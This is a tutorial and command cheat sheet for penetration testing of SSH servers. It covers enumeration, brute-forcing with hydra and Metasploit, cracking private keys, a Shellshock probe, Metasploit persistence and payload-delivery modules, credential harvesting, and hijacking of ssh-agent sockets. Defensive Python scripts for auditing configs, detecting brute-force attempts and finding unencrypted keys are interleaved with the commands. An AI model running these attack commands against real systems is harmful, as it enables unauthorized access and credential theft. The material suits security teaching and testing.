
SSH Penetration Testing 

SSH, which stands for Secure Shell, is a cryptographic network protocol used for secure communication over an unsecured network. It provides a secure way to access and manage remote devices or systems over a potentially insecure network, such as the internet.

SSH allows users to log into and execute commands on a remote machine securely. It uses a client-server model, where the SSH server runs on the remote machine, and the SSH client is used by the user to connect to the server. The communication between the client and the server is encrypted, providing confidentiality and integrity of the data exchanged.

Some common use cases for SSH include:

  1. Remote Command Execution: Users can log in to a remote server and execute commands as if they were physically present at the machine.
  2. File Transfer: SSH includes tools like SCP (Secure Copy) and SFTP (Secure File Transfer Protocol) for secure file transfer between a local and a remote machine.
  3. Tunneling and Port Forwarding: SSH can be used to create secure tunnels for forwarding ports, allowing secure access to services that might otherwise be insecure over the network.
  4. Remote Administration: System administrators often use SSH to manage servers and networking devices remotely.

SSH operates on port 22 by default, but it can be configured to use a different port if needed. It is widely used in the IT industry and plays a crucial role in securing remote access to servers and other devices.

Managing SSH Service

Verify SSH Server Status

systemctl status ssh

Start SSH Service

systemctl start ssh

Stop SSH Service

systemctl stop ssh

Restart SSH Service

systemctl restart ssh

Enable the SSH server to start on boot

systemctl enable ssh

When performing SSH penetration testing, several interesting files may contain sensitive information and can be targeted by an attacker.

Client Config

The SSH client configuration file can be used to automate connection settings or to define jump hosts between machines; take some time to check it:

vi /etc/ssh/ssh_config

Server Config

This file contains the configuration settings for the SSH daemon, which can be targeted for configuration-based attacks.

vi /etc/ssh/sshd_config

Recommendation: look for active tunnel (port forwarding) settings and agent forwarding; both help with lateral movement.
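The directives a pentester reads out of sshd_config are the same ones a defender should audit before the engagement. The following added example (not code from the original post) parses an sshd_config the way sshd does (first value wins, Match blocks are conditional), flags risky effective values including the OpenSSH defaults that apply when a directive is absent, and writes a hardened copy with each flagged directive corrected. The sample configuration, the risk table and the recommended values are this example's own assumptions; the directive names are real sshd_config keywords.

```python
"""Audit an sshd_config for the directives a pentester checks first.

Added example, not code from the original post. SAMPLE_SSHD_CONFIG is
constructed; the directive names are real sshd_config(5) keywords and
DEFAULTS follow OpenSSH's defaults for when a directive is absent.
"""
import re

# directive -> (risky values, or None for a numeric ceiling; recommended value; why)
RISKY = {
    "PermitRootLogin":        ({"yes"}, "no", "root can be brute-forced directly"),
    "PasswordAuthentication": ({"yes"}, "no", "enables online password guessing"),
    "PermitEmptyPasswords":   ({"yes"}, "no", "accounts without a password become reachable"),
    "AllowAgentForwarding":   ({"yes"}, "no", "forwarded agent sockets can be hijacked on the host"),
    "AllowTcpForwarding":     ({"yes", "all"}, "no", "turns the host into a pivot"),
    "PubkeyAuthentication":   ({"no"}, "yes", "pushes users back to passwords"),
    "X11Forwarding":          ({"yes"}, "no", "extra attack surface per session"),
    "MaxAuthTries":           (None, "3", "high values make guessing cheaper"),
}
DEFAULTS = {  # effective value when the file does not set the directive
    "PermitRootLogin": "prohibit-password", "PasswordAuthentication": "yes",
    "PermitEmptyPasswords": "no", "AllowAgentForwarding": "yes",
    "AllowTcpForwarding": "yes", "PubkeyAuthentication": "yes",
    "X11Forwarding": "no", "MaxAuthTries": "6",
}

SAMPLE_SSHD_CONFIG = """\
# constructed sample, not a real host's configuration
Port 22
PermitRootLogin yes
PasswordAuthentication yes
#PermitEmptyPasswords no
MaxAuthTries 10
AllowAgentForwarding yes
AllowTcpForwarding no
Match User backup
    PasswordAuthentication yes
"""


def split_directive(line):
    """'Key value' or 'Key=value' -> (key lowercased, value lowercased); ('', '') if blank."""
    line = line.split("#", 1)[0].strip()
    if not line:
        return "", ""
    parts = re.split(r"[\s=]+", line, maxsplit=1)
    return parts[0].lower(), (parts[1].strip().lower() if len(parts) > 1 else "")


def parse_sshd_config(text):
    """Effective top-level settings. sshd keeps the FIRST value it sees for a
    directive, and directives inside a Match block apply only conditionally,
    so those are skipped here."""
    settings, in_match = {}, False
    for raw in text.splitlines():
        key, value = split_directive(raw)
        if key == "match":
            in_match = True
        elif key and not in_match:
            settings.setdefault(key, value)
    return settings


def audit_sshd_config(text):
    """List (directive, effective value, recommended value, reason) for risky settings."""
    settings = parse_sshd_config(text)
    findings = []
    for directive, (risky, recommended, reason) in RISKY.items():
        effective = settings.get(directive.lower(), DEFAULTS[directive].lower())
        if risky is None:  # numeric ceiling
            flagged = effective.isdigit() and int(effective) > int(recommended)
        else:
            flagged = effective in risky
        if flagged:
            findings.append((directive, effective, recommended, reason))
    return findings


def hardened_copy(text):
    """Return the config with every flagged directive set to its recommended value.
    The first top-level occurrence is rewritten in place; directives that were only
    implied by a default are appended at the end."""
    fixes = {d: rec for d, _, rec, _ in audit_sshd_config(text)}
    by_lower = {d.lower(): d for d in fixes}
    out, done, in_match = [], set(), False
    for raw in text.splitlines():
        key, _ = split_directive(raw)
        if key == "match":
            in_match = True
        directive = by_lower.get(key)
        if directive and not in_match and directive not in done:
            out.append(f"{directive} {fixes[directive]}")
            done.add(directive)
        else:
            out.append(raw)
    out.extend(f"{d} {rec}" for d, rec in fixes.items() if d not in done)
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    for directive, value, recommended, reason in audit_sshd_config(SAMPLE_SSHD_CONFIG):
        print(f"{directive}: {value!r} -> set to {recommended!r} ({reason})")
    print("--- hardened ---")
    print(hardened_copy(SAMPLE_SSHD_CONFIG), end="")
```

Run it against a real file with `audit_sshd_config(open("/etc/ssh/sshd_config").read())`; an empty config is also worth auditing, because the OpenSSH defaults alone leave password authentication and both kinds of forwarding enabled.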

Authorized Keys

This file contains the public keys that are authorized to access a user’s account, which can be targeted by an attacker to gain unauthorized access. By default it lives in each user’s home directory; the AuthorizedKeysFile directive in sshd_config can relocate it.

vi ~/.ssh/authorized_keys

Known Hosts

cat /home/rfs/.ssh/known_hosts

RSA Keys

Default folder containing the user’s key pairs (id_rsa, id_rsa.pub), known_hosts and authorized_keys:

cd ~/.ssh
cd /home/rfs/.ssh

SSH Authentication Types

SSH supports several authentication methods to verify the identity of users attempting to connect to a server. The authentication methods are used to ensure that only authorized users can access the system. Here are some common SSH authentication types:

  1. Password Authentication:
  • Users provide a password to authenticate themselves during the login process.
  • While simple, it’s generally considered less secure than other methods, especially if strong, complex passwords are not enforced.
  2. Public Key Authentication:
  • Users generate a pair of cryptographic keys: a public key and a private key.
  • The public key is placed on the server, while the private key remains on the user’s local machine.
  • During authentication, the private key is used to sign a challenge, and the server verifies it with the stored public key.
  • This method is often considered more secure than password authentication and is widely used.
  3. Keyboard-Interactive Authentication:
  • It allows for more interactive authentication methods, such as one-time passwords, biometrics, or other types of challenges.
  • It can be used for multi-factor authentication, making it more secure than simple password authentication.
  4. Host-Based Authentication:
  • Authentication is based on the client host’s identity rather than the user’s.
  • This method is less common and has some security concerns, so it is often not recommended for general use.
  5. Certificate-Based Authentication:
  • Similar to public key authentication but involves the use of X.509 certificates.
  • Certificates are signed by a trusted certificate authority (CA) or self-signed, and the server verifies the client’s certificate during the authentication process.
  • Provides a way to manage and revoke access centrally.
  6. GSSAPI (Generic Security Services Application Programming Interface) Authentication:
  • Integrates with external security services such as Kerberos for user authentication.
  • Requires additional setup but can be useful in environments where centralized authentication services are used.

The choice of authentication method depends on security requirements, user convenience, and the specific use case. Public key authentication, especially with passphrase-protected private keys, is commonly recommended for its balance between security and usability.

SSH Hacking Tools

Tools commonly used:

  • nmap
  • ssh-audit
  • CrackMapExec
  • john
  • thc-hydra
  • metasploit
  • SSH-KeyGrab

1. SSH Enumeration

After scanning a network and finding port 22 open on a remote host, we need to identify which SSH service is running and its version; we can use Nmap:

nmap -sV -p22 192.168.1.96

SSH Banner Grabber

Banner grabbing is an easy technique but can help us a lot: we can verify which service version is running on the remote server and look for CVEs related to it.

Banner grabbing can be useful for several reasons, including:

  1. Identifying the version and type of SSH server: This information can be used to determine if the SSH server is vulnerable to known exploits or if there are any known security issues with the version of the software being used.
  2. Checking for compliance with organizational security policies: Administrators may want to ensure that all SSH servers in their organization are configured to display a standard banner message that includes specific information.
  3. Verifying the authenticity of an SSH server: Banner messages can be used to verify that the SSH server being accessed is the intended one, rather than a fake or rogue server.

Several tools can be used for SSH banner grabbing, such as Nmap, Netcat, and SSH-Banner. These tools connect to an SSH server and retrieve the banner message. The retrieved banner can then be analyzed to determine the information that is being displayed.

nc 192.168.1.96 22

If we try to connect using the verbose parameter we can check all the information necessary to authenticate on the remote server.

ssh -v 192.168.1.96

Detect SSH Authentication Type

To detect the SSH authentication type being used to access a system, examine the system logs: sshd records the method (publickey, password, keyboard-interactive) every time a user authenticates via SSH.

Here’s how you can check the SSH authentication type on a Linux system:

  1. Open the system log file at /var/log/auth.log using your preferred text editor.
  2. Search for the line that contains the user login information you want to check.
  3. Look for the “Accepted” keyword in the line, which indicates that the authentication was successful; the word that follows it is the method used.

From the client side, a verbose connection attempt shows which authentication methods the server offers before any credential is sent:

ssh -v 192.168.1.96

Detect remote users

msfconsole
msf> use auxiliary/scanner/ssh/ssh_enumusers

2. SSH Exploitation (Port 22 Vulnerabilities)

At this point we only know which service is running on port 22 and its version (OpenSSH_4.7p1 Debian-8ubuntu1). Assuming we have found the username msfadmin, we will try to brute-force its password using hydra.

Bruteforce SSH Service

hydra -l msfadmin -P rockyou.txt ssh://192.168.1.96
crackmapexec ssh -U user -P passwd.lst 192.168.1.96
use auxiliary/scanner/ssh/ssh_login
set rhosts 192.168.1.96
set user_file user.txt
set pass_file password.txt
run
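Both the log-based check under “Detect SSH Authentication Type” and the brute-force runs above leave their traces in /var/log/auth.log. This added example (not code from the original post) parses constructed OpenSSH log lines: it inventories which authentication methods are actually being accepted, flags sources with a burst of failed logins, and reports the event a responder cares about most, a successful login from a source that was just guessing. The log lines, hostnames, users, addresses and thresholds are all constructed for the demonstration.

```python
"""Inventory SSH authentication methods and spot password guessing in auth.log.

Added example, not code from the original post. SAMPLE_AUTH_LOG is constructed
in the OpenSSH/syslog line format; hosts, users and addresses are made up.
"""
import re
from collections import Counter, defaultdict
from datetime import datetime, timedelta

# sshd logs "Accepted <method> for <user> from <src> port <n>" on success and
# "Failed <method> for [invalid user ]<user> from <src> port <n>" on failure.
LINE_RE = re.compile(
    r"^(?P<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?P<method>\S+) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<src>\S+) port \d+"
)
PLACEHOLDER_YEAR = 2024  # syslog timestamps carry no year; any year orders them

SAMPLE_AUTH_LOG = """\
Jan 10 12:00:01 target sshd[1201]: Accepted publickey for rfs from 192.168.1.50 port 51234 ssh2: RSA SHA256:constructedfingerprint
Jan 10 12:00:05 target sshd[1202]: Accepted password for msfadmin from 192.168.1.96 port 40010 ssh2
Jan 10 12:01:00 target sshd[1210]: Failed password for msfadmin from 10.0.0.7 port 41000 ssh2
Jan 10 12:01:01 target sshd[1211]: Failed password for msfadmin from 10.0.0.7 port 41001 ssh2
Jan 10 12:01:02 target sshd[1212]: Failed password for invalid user admin from 10.0.0.7 port 41002 ssh2
Jan 10 12:01:02 target sshd[1213]: Failed password for invalid user root from 10.0.0.7 port 41003 ssh2
Jan 10 12:01:03 target sshd[1214]: Failed password for msfadmin from 10.0.0.7 port 41004 ssh2
Jan 10 12:01:04 target sshd[1215]: Failed password for msfadmin from 10.0.0.7 port 41005 ssh2
Jan 10 12:01:30 target sshd[1216]: Accepted password for msfadmin from 10.0.0.7 port 41006 ssh2
Jan 10 12:05:00 target sshd[1220]: Failed password for alice from 192.168.1.77 port 50000 ssh2
Jan 10 12:30:00 target sshd[1230]: Accepted keyboard-interactive/pam for alice from 192.168.1.77 port 50001 ssh2
Jan 10 12:31:00 target sshd[1231]: pam_unix(sshd:session): session opened for user alice by (uid=0)
"""


def parse_auth_log(text):
    """Turn matching sshd lines into dicts; unrelated lines (pam, disconnects) are ignored."""
    events = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(f"{m['ts']} {PLACEHOLDER_YEAR}", "%b %d %H:%M:%S %Y")
        events.append({"ts": ts, "result": m["result"], "method": m["method"],
                       "user": m["user"], "src": m["src"]})
    return events


def auth_methods_used(text):
    """Count successful logins per method: the 'Accepted <method>' check from the text."""
    return Counter(e["method"] for e in parse_auth_log(text) if e["result"] == "Accepted")


def brute_force_sources(text, threshold=5, window=timedelta(minutes=1)):
    """Sources with at least `threshold` failures inside any sliding `window`."""
    failures = defaultdict(list)
    for e in parse_auth_log(text):
        if e["result"] == "Failed":
            failures[e["src"]].append(e["ts"])
    flagged = []
    for src, times in failures.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:  # slide the window forward
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            flagged.append((src, peak))
    return flagged


def compromise_candidates(text, **window_args):
    """Successful logins from a source that was guessing: the event to page on."""
    suspects = {src for src, _ in brute_force_sources(text, **window_args)}
    return [(e["user"], e["src"], e["method"]) for e in parse_auth_log(text)
            if e["result"] == "Accepted" and e["src"] in suspects]


if __name__ == "__main__":
    print("accepted methods:", dict(auth_methods_used(SAMPLE_AUTH_LOG)))
    for src, n in brute_force_sources(SAMPLE_AUTH_LOG):
        print(f"guessing from {src}: {n} failures inside one minute")
    for user, src, method in compromise_candidates(SAMPLE_AUTH_LOG):
        print(f"ALERT: {user} logged in by {method} from {src} after the failures")
```

On a real host, feed it `open("/var/log/auth.log").read()`. The method inventory is the quickest way to see that an account the policy says is key-only is still being accepted with a password, and the "accepted after a burst" rule turns a noisy brute-force alert into an actionable one.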

Crack SSH Private Keys

ssh2john id_rsa.priv > hash.txt
john hash.txt --wordlist=/usr/share/wordlists/rockyou.txt

https://github.com/openwall/john/blob/bleeding-jumbo/run/ssh2john.py

Default Credentials

https://github.com/PopLabSec/SSH-default-Credentials

SSH Bad Keys

Some embedded devices have static SSH keys, you can find a collection of keys here:

https://github.com/poplabdev/ssh-badkeys

SSH Exploits

Version | Exploit
OpenSSH <7.4 | 
LibSSH | RCE, CVE-2018-10933

SSH Exploits list

SSH and ShellShock

LC_X='() { :; }; echo vulnerable' ssh rfs@poplabsec.com -o SendEnv=LC_X

3. SSH Post Exploitation – Pentest SSH

Persistence

msf > use post/linux/manage/sshkey_persistence
msf post(sshkey_persistence) > set session 1
msf post(sshkey_persistence) > exploit

SSH User Code Execution

msf > use exploit/multi/ssh/sshexec
msf exploit(sshexec) > set rhosts 192.168.1.103
msf exploit(sshexec) > set username rfs
msf exploit(sshexec) > set password poplabsec
msf exploit(sshexec) > set srvhost 192.168.1.107
msf exploit(sshexec) > exploit

Lateral Movement

Read more about Pivoting using SSH

Steal SSH credentials

If we have a meterpreter shell we can use the post-exploitation module post/multi/gather/ssh_creds and try to collect all SSH credentials on the machine.

use post/multi/gather/ssh_creds
msf post(ssh_creds) > set session 1
msf post(ssh_creds) > exploit

Search SSH Key files

find / -name "*id_rsa*" 2>/dev/null

Search SSH Key files by file content (catches keys that were renamed)

grep -rl "PRIVATE KEY-----" / 2>/dev/null
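For the defender, the question behind “Crack SSH Private Keys” and the two searches above is which keys on a host would need no cracking at all. This added example (not code from the original post) walks a directory tree, recognises private keys by content rather than file name, reads the cipher field of the OpenSSH key format (or the Proc-Type/DEK-Info headers of legacy PEM) to tell passphrase-protected keys from cleartext ones, and notes loose file permissions. The sample files are synthetic and written to a temporary directory: the OpenSSH blobs carry only the header fields a real key begins with, not key material, and the function and file names are this example's own.

```python
"""Find private keys on disk and report the ones stored without a passphrase.

Added example, not code from the original post. The sample key files are
synthetic: the OpenSSH blobs contain only the header a real key starts with
("openssh-key-v1", cipher name, KDF name) and no usable key material.
"""
import base64
import os
import re
import stat
import struct
import tempfile

OPENSSH_MAGIC = b"openssh-key-v1\x00"


def ssh_string(data: bytes) -> bytes:
    """Encode bytes as an SSH wire 'string' (uint32 length prefix)."""
    return struct.pack(">I", len(data)) + data


def fake_openssh_key(cipher: bytes, kdf: bytes) -> str:
    """Constructed, truncated OpenSSH private key: header only, no key material."""
    blob = OPENSSH_MAGIC + ssh_string(cipher) + ssh_string(kdf) + ssh_string(b"") + struct.pack(">I", 1)
    b64 = base64.b64encode(blob).decode()
    return f"-----BEGIN OPENSSH PRIVATE KEY-----\n{b64}\n-----END OPENSSH PRIVATE KEY-----\n"


def classify_private_key(text: str):
    """Return {'format', 'encrypted', 'cipher'} for a private-key file, else None."""
    if "-----BEGIN OPENSSH PRIVATE KEY-----" in text:
        b64 = "".join(ln for ln in text.splitlines() if ln and not ln.startswith("-----"))
        try:
            blob = base64.b64decode(b64, validate=True)
            if not blob.startswith(OPENSSH_MAGIC):
                raise ValueError("bad magic")
            off = len(OPENSSH_MAGIC)
            (clen,) = struct.unpack(">I", blob[off:off + 4])
            cipher = blob[off + 4:off + 4 + clen].decode("ascii")
        except (ValueError, struct.error):
            return {"format": "openssh-v1", "encrypted": None, "cipher": "unparseable"}
        # ciphername "none" means the key material is stored in the clear
        return {"format": "openssh-v1", "encrypted": cipher != "none", "cipher": cipher}
    if "-----BEGIN ENCRYPTED PRIVATE KEY-----" in text:
        return {"format": "pkcs8", "encrypted": True, "cipher": "pkcs8-pbes"}
    if "-----BEGIN PRIVATE KEY-----" in text:
        return {"format": "pkcs8", "encrypted": False, "cipher": "none"}
    m = re.search(r"-----BEGIN (RSA|DSA|EC) PRIVATE KEY-----", text)
    if m:
        # legacy PEM keys mark encryption with Proc-Type / DEK-Info headers
        dek = re.search(r"DEK-Info: ([^,\s]+)", text)
        encrypted = "Proc-Type: 4,ENCRYPTED" in text and dek is not None
        return {"format": "pem-" + m.group(1).lower(), "encrypted": encrypted,
                "cipher": dek.group(1) if dek else "none"}
    return None


def scan_for_private_keys(root: str, max_bytes: int = 64 * 1024):
    """Walk root and classify every small file by content, whatever its name."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                if st.st_size > max_bytes:
                    continue
                with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                    info = classify_private_key(fh.read())
            except OSError:
                continue
            if info:
                info.update(name=name, path=path,
                            loose_perms=bool(stat.S_IMODE(st.st_mode) & 0o077))
                findings.append(info)
    return sorted(findings, key=lambda f: f["path"])


def unencrypted_key_names(root: str):
    """Names of keys that need no cracking at all (stored with cipher 'none')."""
    return sorted(f["name"] for f in scan_for_private_keys(root) if f["encrypted"] is False)


def build_demo_dir() -> str:
    """Create a temp directory with constructed sample files and return its path."""
    root = tempfile.mkdtemp(prefix="sshkeys-demo-")
    samples = {
        "id_rsa": fake_openssh_key(b"none", b"none"),              # no passphrase
        "backup.key": fake_openssh_key(b"aes256-ctr", b"bcrypt"),  # passphrase-protected
        "legacy.pem": ("-----BEGIN RSA PRIVATE KEY-----\nProc-Type: 4,ENCRYPTED\n"
                       "DEK-Info: AES-128-CBC,00112233445566778899AABBCCDDEEFF\n\n"
                       "Q09OU1RSVUNURUQ=\n-----END RSA PRIVATE KEY-----\n"),
        "notes.txt": "nothing to see here\n",
    }
    for name, content in samples.items():
        path = os.path.join(root, name)
        with open(path, "w") as fh:
            fh.write(content)
        os.chmod(path, 0o644 if name == "id_rsa" else 0o600)  # id_rsa deliberately readable
    return root


if __name__ == "__main__":
    for f in scan_for_private_keys(build_demo_dir()):
        state = "UNENCRYPTED" if f["encrypted"] is False else "encrypted"
        perms = " (group/world readable)" if f["loose_perms"] else ""
        print(f"{f['name']:<12} {f['format']:<12} {f['cipher']:<12} {state}{perms}")
```

Point `scan_for_private_keys` at a home directory or a backup share to get the list worth acting on: an unencrypted key found there is a credential, and an encrypted one with loose permissions is the input to the ssh2john step above.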

SSH Hijacking

Find the sshd process

ps aux | grep sshd
# Attacker looks for the SSH_AUTH_SOCK in the victim's environment variables
# (replace <PID> with the pid of the victim's sshd session process found above;
# -z splits the NUL-separated environ file into one entry per line)
grep -z SSH_AUTH_SOCK /proc/<PID>/environ

Attacker hijacks the victim’s ssh-agent socket

SSH_AUTH_SOCK=/tmp/ssh-XXXXXXXXX/agent.XXXX ssh-add -l

The attacker can then log in to remote systems as the victim

ssh 192.168.1.107 -l victim
